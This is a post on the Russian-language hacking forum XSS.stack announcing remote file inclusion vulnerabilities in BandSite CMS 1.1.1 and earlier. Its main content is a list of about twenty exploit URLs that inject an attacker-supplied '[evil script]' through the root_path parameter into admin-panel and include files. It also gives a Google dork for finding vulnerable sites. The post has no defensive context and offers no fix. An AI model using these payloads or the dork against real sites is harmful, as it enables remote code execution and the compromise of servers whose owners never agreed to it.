• XSS.stack #1 – первый литературный журнал от юзеров форума

Web BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities

Отслеживать

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities
Пример/Эксплоит:
Код: 
# http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script]
google dork: "Grayscale CMS"
:zns2: bandsitecms
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх